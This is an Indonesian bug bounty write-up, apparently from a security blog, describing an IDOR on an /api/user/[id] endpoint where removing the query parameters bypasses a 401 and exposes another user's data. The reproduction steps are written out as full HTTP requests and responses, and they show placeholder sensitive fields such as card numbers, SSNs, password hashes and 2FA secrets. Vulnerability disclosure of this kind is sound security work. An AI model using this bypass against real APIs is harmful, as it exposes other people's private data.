IDOR bypassed 401 leading to a leak of personal data

📌 Deskripsi Singkat

Saya menemukan kerentanan Insecure Direct Object Reference (IDOR) di endpoint GET /api/user/[id]. Sistem awalnya menampilkan 401 Unauthorized saat mengakses data pengguna lain dengan parameter tertentu. Namun, saat parameter dihapus dari URL, endpoint tersebut justru memberikan respon sukses dan menampilkan data pribadi pengguna lain, tanpa otorisasi yang benar.

🔍 Langkah Reproduksi

Login sebagai ATTACKER (User A).
Saya menemukan request seperti berikut ketika menelusuri bagian profile

GET /api/user/12345?token=abc123xyz&include=profile,contacts,settings HTTP/1.1 Host: target-website.comCookie: session_id=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.fake.jwt.token; theme=dark; locale=en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/114.0.0.0 Safari/537.36 Accept: application/json, text/plain, / Accept-Language: en-US,en;q=0.9 Connection: keep-alive Referer: https://target-website.com/dashboard

Request ini menampilkan data data pribadi akun milik ATTACKER

HTTP/1.1 200 OK Content-Type: application/json Cache-Control: no-store

{ "user_id": "1234567890", "username": "johndoe", "email": "johndoe@example.com", "password_hash": "$2b$12$EixZaYVK1fsbw1ZfbX3OXe.PxoEwFv0uQ1m07QzH2dq0WyP5fpGuK", "credit_card": { "number": "4111111111111111", "expiry": "12/25", "cvv": "123" }, "social_security_number": "123-45-6789", " bank_account": { "account_number": "9876543210", "routing_number": "021000021" }, "jwt_token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...", "two_factor_secret": "JBSWY3DPEHPK3PXP" }
Disini saya mencoba mengganti ID ATTACKER 12345 ke ID akun VICTIM 12346 untuk melihat data data pribadi milik akun victim dan ternyata itu tidak bisa saya mendapatkan → Respon: 401 Unauthorized.

HTTP/1.1 401 Unauthorized
Content-Type: application/json
WWW-Authenticate: Bearer realm="example", error="invalid_token", error_description="The access token is missing or invalid."

{ "error": "unauthorized", "message": "Authentication required or invalid credentials." }
Setelah itu saya mencoba menghapus semua parameter yang ada pada request line seperti

GET /api/user/12346 HTTP/1.1
Host:target-website.com
Cookie: session_id=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.fake.jwt.token; theme=dark; locale=en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/114.0.0.0 Safari/537.36 Accept: application/json, text/plain, / Accept-Language: en-US,en;q=0.9 Connection: keep-alive
Referer: https://target-website.com/dashboard
Dan ternyata ini berhasil melewati 401!! saya dapat melihat data data pribadi akun VICTIM muncul di respon

{
"user_id": "1234567890",
"username": "albert",
"email": "ablert@example.com",
"password_hash": "$$2b$12$X5jVq3nySlDFG8WqQIwYQesJ2Rb6x9twQ4Q49gJLbYqRpItGmfP5C",
"credit_card": { "number": "5111111111111113", "expiry": "10/28", "cvv": "124" },
"social_security_number": "125-46-6889",
"bank_account": { "account_number": "9276443211", "routing_number": "023000022" },
"jwt_token": "eyJfhwefJHWHFWHjwgfhwjGEEJJRTRJWrjg...",
"two_factor_secret": "JBSEIHWHFWEIOJWRTG"
}

*Jeder Duplicate

IDOR bypassed 401 leading to a leak of personal data

More from this blog

Simple AHK Tool untuk Mempercepat Testing (Bug Bounty)

CVE-2025-14812: Zero-Click Address Bar Spoofing in Arc Browser iOS

Write-up: Intigriti 0226 challenge

[Bug Bounty] Race Condition: Redeeming Single-Use Coupon Multiple Times

Bypass Popup Blocking pada Mode Split Screen melalui Abuse Event onerror

Command Palette

More from this blog